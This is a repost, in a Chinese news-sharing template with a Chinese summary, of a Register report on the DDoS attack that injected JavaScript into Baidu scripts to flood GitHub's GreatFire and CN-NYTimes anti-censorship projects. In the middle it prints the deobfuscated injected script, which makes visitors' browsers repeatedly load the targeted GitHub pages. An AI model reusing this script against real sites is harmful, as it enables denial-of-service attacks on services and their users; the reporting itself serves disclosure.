1.媒体来源: The Register
2.完整新闻标题:
The injected JavaScript used to smash anti-Great Firewall of China GitHub
projects offline
来自百度的恶意 JavaScript 被用来攻击 GitHub
3.完整新闻内文:
GitHub's servers are being hammered by web traffic from an army of unwitting
cyber-foot-soldiers.
It appears when thousands of people visit websites that serve ads and
tracking code from Baidu – China's answer to Google – from outside the
Middle Kingdom, network gateways on the Chinese border silently inject a
JavaScript function into those websites' pages.
This simple code instructs browsers to stealthily connect to GitHub.com every
two seconds, creating "an extremely large amount of traffic," the San
Francisco-based upstart said.
The JS specifically targets two GitHub-hosted projects – Greatfire and
CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of
China. The firewall blocks things like VPNs and censors web traffic, hiding
information on the Tiananmen Square massacre and so on.
GitHub said on Friday that the bursts in traffic, effectively a string of
distributed denial-of-service attacks, are causing intermittent outages.
"We're aware that GitHub.com is intermittently unavailable for some users
during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.
"Restoring service for all users while deflecting attack traffic is our
number one priority. We've deployed our volumetric attack defenses against an
extremely large amount of traffic. Performance is stabilizing."
Hours earlier, the biz noted: "We've been under continuous DDoS attack for
24+ hours. The attack is evolving, and we're all hands on deck mitigating."
According to a security researcher at Insight Labs, HTTP requests to
hm.baidu.com/h.js are being hijacked by China's border gateways, which insert
some semi-obfuscated JavaScript to attack the aforementioned GitHub
repositories. The injected script looks like this, once unscrambled:
document.write("<script src=" +
"'http://libs.baidu.com/jquery/2.0.0/jquery.min.js'" +
">\x3c/script>");
!window.jQuery && document.write(
"<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
var a = new Date;
return ( Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(),
a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 )
}
url_array = ["https://github.com/greatfire/",
"https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
}
function get(a) {
var b;
$.ajax({
url: a,
dataType: "script",
timeout: 1E4,
cache: !0,
beforeSend: function() {
requestTime = (new Date).getTime()
},
complete: function() {
responseTime = (new Date).getTime();
b = Math.floor(responseTime - requestTime);
3E5 > responseTime - startime && (r_send(b), count += 1)
}
})
}
function r_send(a) {
setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
The Greatfire project provides links to cloud-hosted mirrors of websites –
such as the BBC and Google's Blogger – that Chinese people can use to dodge
the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's
pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the
New York Times.
"A certain device at the border of China's inner network and the Internet has
hijacked the HTTP connections went into China, replaced some javascript files
from Baidu with malicious ones that would load [the GitHub pages] every two
seconds," Insight Labs' Anthr@x wrote.
"In other words, even people outside China are being weaponized to target
things the Chinese government does not like, for example, freedom of speech."
While there is no proof that the Chinese government was directly involved in
the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that
someone, state or otherwise, wants these projects silenced.
发现来自百度的恶意 JavaScript 挟持不知情的网友流量 DDoS 攻击 GitHub.
这种恶意脚本指示浏览器每两秒连结一次 GitHub.com, 而给 GitHub 带来巨大的流量。
该脚本针对 GitHub上的两个项目 Greatfire 和 CN-NYTimes.
GitHub 表示由 DDoS 产生的突发流量造成部份服务间歇地无法使用。
目前无直接证据证明中国政府直接参与这次攻击。
4.完整新闻连结 (或短网址): http://tinyurl.com/pydfc5f
5.备注: